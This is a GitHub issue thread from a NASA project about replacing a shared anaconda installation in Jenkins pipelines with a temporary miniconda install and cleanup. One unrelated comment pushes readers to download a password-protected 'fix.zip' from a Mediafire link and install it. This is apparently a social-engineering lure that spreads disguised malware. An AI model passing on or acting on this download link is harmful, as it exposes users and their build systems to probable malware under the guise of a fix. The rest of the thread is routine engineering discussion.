### ISSUE TITLE
Remove references to /usr/local/anaconda3 from all Jenkins Pipelines

### ISSUE THREAD

**Issue by collinss-jpl** [nasa/opera-sds-pge#497]
Our System Admin team wants to uninstall the anaconda installation under `/usr/local/anaconda3` from `opera-pge-ci` since it is difficult to maintain and patch. Several of our Jenkins pipelines currently utilize this installation to create a temporary environment for installing certain dependencies to (such as Sphinx).

To comply with this, we need to rework our existing Jenkinsfiles to perform a temporary installation of miniconda before creating the temporary conda environment. This should include the `build-int-test` and `build-test-deploy` Jenkinsfiles.

The following section of our wiki documents how miniconda can be download and silently installed as part of a pipeline: https://github.com/nasa/opera-sds-pge/wiki/New-Developer-Onboarding#install-miniconda-environment

After performing the installation, the remaining steps to create a temporary environment should remain mostly the same, but the location to the `conda` CLI will need to reflect the miniconda installation location.

The cleanup stage for the pipelines will also need to be updated to remove the directory containing the temporary miniconda installation. This should be sufficient as an "uninstall" step.

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by collinss-jpl** [comment]
Closed by #498
